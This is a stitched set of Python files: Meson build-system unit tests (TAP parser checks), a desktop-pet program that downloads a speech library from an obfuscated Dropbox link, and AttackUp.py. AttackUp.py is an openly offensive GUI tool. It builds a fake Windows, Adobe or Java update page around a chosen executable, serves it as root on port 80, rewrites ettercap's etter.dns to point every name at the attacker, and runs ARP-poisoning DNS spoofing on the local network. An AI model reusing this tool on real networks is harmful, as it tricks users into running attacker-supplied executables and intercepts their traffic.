testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
    Check that the Clang compiler is at least a specified version, whether AppleClang or regular Clang.
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
        AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
raise SystemExit(main())
|
AttackUp.py
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Module.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
sshFile="Core/dark_style.css"
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_start = QPushButton("Start DNS",self)
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_start.setFixedHeight(50)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_start.setIcon(QIcon("rsc/start.png"))
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_start.clicked.connect(self.dns_start)
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_start,0,3)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Module/Win-Explo/Windows_Update/index.html"):
remove("Module/Win-Explo/Windows_Update/index.html")
if path.isfile("Module/Win-Explo/Windows_Update/windows-update.exe"):
remove("Module/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Module/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
except OSError,e:
print e
                if getuid() == 0:
file_html = open("Module/Win-Explo/Settings_WinUpdate.html","r").read()
settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
if self.path_file_etter == None:
self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
            if self.path_file_etter == None:
                QMessageBox.information(self, 'Path not Found', "The file etter.dns was not found; check that ettercap is installed.")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
            QMessageBox.information(self, 'Server Phishing Error', "Error: the phishing server has not been started.")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
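        # Serve the fake update page with PHP's built-in web server on port 80,
        # bound to the local IP, inside an xterm so its output stays visible.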
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
def getSize(self,filename):
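        # Returns the raw file size in bytes (os.stat().st_size); note the caller
        # appends a "KB" label to this value when templating the fake update page.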
st = stat(filename)
return st.st_size
|
skahdibuddy.py
|
import tkinter as tk
from tkinter import *
from os import listdir
from os.path import isfile, join
from PIL import Image
from random import randint
import os, tempfile, cv2, time
import sys, webbrowser, shutil ,random, pyttsx3, threading
import json, ctypes, subprocess, pythoncom, re
import base64, urllib, requests
global speechdatabase, proclist
print("Sorry for the shit log output in advance. I'll clean this up asap")
try:
with open('config.ini') as data_file:
configsetting = json.load(data_file)
ctypes.windll.user32.MessageBoxW(0, "Welcome back to SkahdiBuddy!\nPlease note that SkahdiBuddy takes a moment to boot up. We're working on improving the boot time.", "SkahdiBuddy v1", 0)
except:
configsetting={}
configsetting['walkdelay'] = 0.02
configsetting['thinkdelay'] = 0.001
configsetting['sleepdelay'] = 0.1
configsetting['talkdelay'] = 0.1
configsetting['speech'] = {}
configsetting['speech']['wordsperminute'] = 120
configsetting['speech']['speechvolume'] = 0.9
configsetting['speech_db'] = {}
configsetting['speech_db']['update'] = True
configsetting['speech_db']['encrypt_key'] = 'sbv1'
configsetting['speech_db']['link'] = 'w5vDlsOqwqHDpsKcwqVgw6rDmcOtX8OXw5TDpcKhw5XDkcOuX8OWw5HDo2DDpsKRwqvCp8Olw5XDqMKiwqnDg8OmZcOYw5jCrsKTw5XCkcOJfcK5wpDDqsKpw6fCocOawp3CsMKT'
j = json.dumps(configsetting, indent=4)
f = open('config.ini', 'w')
print(j, end="", file=f)
f.close()
ctypes.windll.user32.MessageBoxW(0, "Welcome to SkahdiBuddy V1.\nThis is either your very first time using me, or you messed up my config file.\nNo matter! I'll make a new one real quick!\nPlease note that SkahdiBuddy takes a moment to boot up. We're working on improving the boot time.", "Mew! SkahdiBuddy v1", 0)
def updateprocesses():
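    # Builds a deduplicated, lowercased list of running .exe names by parsing the
    # output of the Windows `tasklist` command.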
procs = subprocess.check_output(['tasklist'], shell=True)
    procs = re.split(r'\s+', str(procs))
proclist = []
for x in procs:
if ".exe" in x:
proclist.append(x.replace("K\\r\\n","").lower())
updateprocesses.proclist = list(set(proclist))
return proclist
## download speech data library and load it into the db
## decode and encode stolen from https://stackoverflow.com/a/38223403
## - thanks, Ryan Barrett
## PS. I think this entire decode/encode thing is really unnecessary. But ya'll asked for it in the group
## because ya'll didn't want any speech spoilers. so this one is for you.
## PPS. speechdb.sbuddy is not encoded _yet_, sorry. We're getting there.
def update(speechlibrarylink):
link = speechlibrarylink
openlink = urllib.request.urlopen(link).read()
openlink = openlink.decode()
speechlines = openlink
#print(speechlines)
speechlines = speechlines.split('\r\n\r\n')
speechdatabase = {}
for x in speechlines:
program = x.replace("\r","").split('\n',1)[0]
comebacks = x.replace("\r","").split('\n',1)[1].split("\n")
speechdatabase[program]={}
speechdatabase[program]['comebacks']=comebacks
j = json.dumps(speechdatabase, indent=4)
f = open('speechdb.sbuddy', 'w')
print(j, end = "", file = f)
f.close()
print("wrote.")
#print(librarydecoded)
def decode(key, enc):
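    # Undo the simple base64 + key-shift obfuscation applied to the speech-library
    # URL in config.ini, then fetch and rebuild the local speech database.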
dec = []
enc = base64.urlsafe_b64decode(enc).decode()
for i in range(len(enc)):
key_c = key[i % len(key)]
dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)
dec.append(dec_c)
speechlibrarylink = ("".join(dec))
update(speechlibrarylink)
def encode(key, clear):
enc = []
for i in range(len(clear)):
key_c = key[i % len(key)]
enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)
enc.append(enc_c)
print(base64.urlsafe_b64encode("".join(enc).encode()).decode())
#encode(configsetting['speech_db']['encrypt_key'], "https://www.dropbox.com/s/5vrsrq6ap4ev8bb/SLF.txt?dl=1")
if configsetting['speech_db']['update'] == True:
print("Updating speech library...")
try:
decencstr = configsetting['speech_db']['link']
encrypt_key = configsetting['speech_db']['encrypt_key']
decode(encrypt_key, decencstr)
try:
with open('speechdb.sbuddy') as data_file:
speechdatabase = json.load(data_file)
except:
ctypes.windll.user32.MessageBoxW(0, "Sorry for bothering, but I kinda need an internet connection right now.\n\nI'm trying to download the speech databasis, cos it doesn't exist on your local storage.", "SkahdiBuddy v1", 0)
sys.exit()
except:
...
if configsetting['speech_db']['update'] == False:
try:
with open('speechdb.sbuddy') as data_file:
speechdatabase = json.load(data_file)
except:
ctypes.windll.user32.MessageBoxW(0, "Sorry for bothering, but I kinda need an internet connection right now.\n\nI'm trying to download the speech databasis, cos it doesn't exist on your local storage.", "SkahdiBuddy v1", 0)
sys.exit()
spritepath = "./sprites"
onlyfiles = [f for f in listdir(spritepath) if isfile(join(spritepath, f))]
print("Extracting Animations...")
if os.path.exists("./anims"): shutil.rmtree("./anims")
for x in onlyfiles:
#print(onlyfiles)
animation_name = x.split("!")[0]
im = cv2.imread(spritepath+"/"+x)
#print(animation_name)
#print(animation_name)
#print(animation_name)
if not os.path.exists("./anims"):
os.mkdir("./anims")
#print("made animation folder")
if not os.path.exists("./anims/"+animation_name):
os.mkdir("./anims/"+animation_name)
#print("made animation name")
if not os.path.exists("./anims/"+animation_name+"/left"):
os.mkdir("./anims/"+animation_name+"/left")
#print("made animation name / left")
if not os.path.exists("./anims/"+animation_name+"/right"):
os.mkdir("./anims/"+animation_name+"/right")
#print("made animation name / right")
shape_height=(im.shape)[0]
shape_width=(im.shape)[1]
blocks = x.split("!")[1]
#print(str(shape_height), str(shape_width), str(blocks), "=", str(int(shape_width)/int(blocks)))
equs = int(shape_width)/int(blocks)
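    # equs is the width of one animation frame: the sprite sheet's total width
    # divided by the frame count encoded after the '!' in the filename.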
imageObject = Image.open(spritepath+"/"+x)
## ----------------------------------------------------------------
#print("Stripping sprites from tilesets...")
size=(100,100)
for direction in range(0,1):
for y in range(1,int(blocks)+1):
direction = "right"
#print("BLOCKS: ", blocks)
#print(equs*y)
cropped = imageObject.crop((round(equs*y)-equs-1, 0, round(equs*y), shape_height))
#cropped.save(x+str(y)+".png")
cropped = cropped.resize(size)
cropped.save("./anims/"+animation_name+"/"+direction+"/"+str(y)+".png")
for y in range(1,int(blocks)+1):
direction = "left"
#print("BLOCKS: ", blocks)
#print(equs*y)
cropped = imageObject.crop((round(equs*y)-equs-1, 0, round(equs*y), shape_height))
cropped = cropped.transpose(Image.FLIP_LEFT_RIGHT)
cropped = cropped.resize(size)
cropped.save("./anims/"+animation_name+"/"+direction+"/"+str(y)+".png")
## ----------------------------------------------------------------
print("Spawning SkahdiBuddy...")
root = tk.Tk()
root.overrideredirect(True)# Make window invisible
root.wm_attributes("-topmost", True)# Keep skahdi on top even after min
root.wm_attributes("-transparentcolor", "white")
direction = 'right'
screen_height = root.winfo_screenheight()
char_position = "+10+"+str(screen_height-141)
root.geometry(char_position)
updateprocesses()
proclist = (updateprocesses.proclist)
def popupmenu(event):
try:
popup.tk_popup(event.x_root, event.y_root, 0)
finally:
popup.grab_release()
def idleloop(char_position, direction, proclist):
"""
Idle loop spawns the cat at bottom left.
"""
#print("IDLE ANIMATION", char_position)
global talkvar
talkvar = False
count=0
screen_width = root.winfo_screenwidth()
DIR = "./anims" + '/sprite_thinking/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
nextmove = randint(0,100)
#nextmove = 40
nextmove_start = 0
play_animation = 0
## play_animation
## 0 - pause/sleep
## 1 - play/think
## 2 - talk
walkspeed = configsetting['walkdelay']
talkloops = 5 ## this var runs the talking animation for 5 loops before it returns back to the idle animation
talknumber = 0
while 1: #loop for idle animation
DIR = "./anims" + '/sprite_thinking/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['thinkdelay']
if play_animation == 0:
DIR = "./anims" + '/sprite_thinking/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['thinkdelay']
if play_animation == 1:
DIR = "./anims" + '/sprite_sleeping/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['sleepdelay']
if play_animation == 2:
DIR = "./anims" + '/sprite_talking/' + direction + '/'
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['talkdelay']
talknumber = talknumber + 1
if talknumber==talkloops:
talknumber = 0
talkvar = False ## end the talk animation
#print(pausevar)
if count == countmax:
#updateproc = threading.Thread(target=updateprocesses)
#updateproc.daemon = True
#updateproc.start()
count = 0
count = count+1
#print(nextmove_start, nextmove)
## This block decides the character's next move
if nextmove_start==nextmove:
nextmove = randint(40,100)
play_animation = randint(3,20)
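            # 3..14 falls through to the walk branch below, 15..20 to the talk branch;
            # pausevar/talkvar can still override this to sleep (1) or talk (2).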
#print("PLAYANIMATION",play_animation)
nextmove_start = 0
#play_animation = 1
## Base Animations
## - walk
## - talk
## - idle
if pausevar == True:
play_animation = 1
if talkvar == True:
play_animation = 2
if 3 <= play_animation <= 14: ## Walk!
walk_range = randint(10,200)
direction = random.choice(['left','right'])
print("Walking "+direction)
lr_block = int(char_position.split("+")[1]) ## Left - Right
ud_block = int(char_position.split("+")[-1]) ## Up - Down
## Now load the animation files
DIR = "./anims" + '/sprite_walking/' + direction + '/'
count = 0
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
stepjump = lr_block
for steps in range(1,int(walk_range)):
## stepjump max = 1340
## stepjump min = 0
#print("SCREEN WIDTH",screen_width)#1360
if stepjump>=int(screen_width):
stepjump=-80
if stepjump<=-100:
stepjump=int(screen_width)
if direction=="left":
stepjump=stepjump-5
if direction=="right":
stepjump=stepjump+5
if count==countmax:
count=0
count=count+1
#increment by 5. Always
char_position = "+"+str(stepjump)+"+"+str(ud_block)
root.geometry(char_position)
root.image = tk.PhotoImage(file=DIR+str(count)+'.png')
skahlabel = tk.Label(root, image=root.image, bg='white')
skahlabel.pack(side="bottom")
root.update()
skahlabel.destroy()
root.update_idletasks()
time.sleep(walkspeed)
if 15 <= play_animation <= 20:
print("talking "+direction+" "+str(talkvar))
if talkvar == True:
pass
elif talkvar == False:
print("I should be talking -",direction)
talkvar = True ## this makes skahdi speak. please set to false when done speaking.
## speech thread here.
updateprocesses()
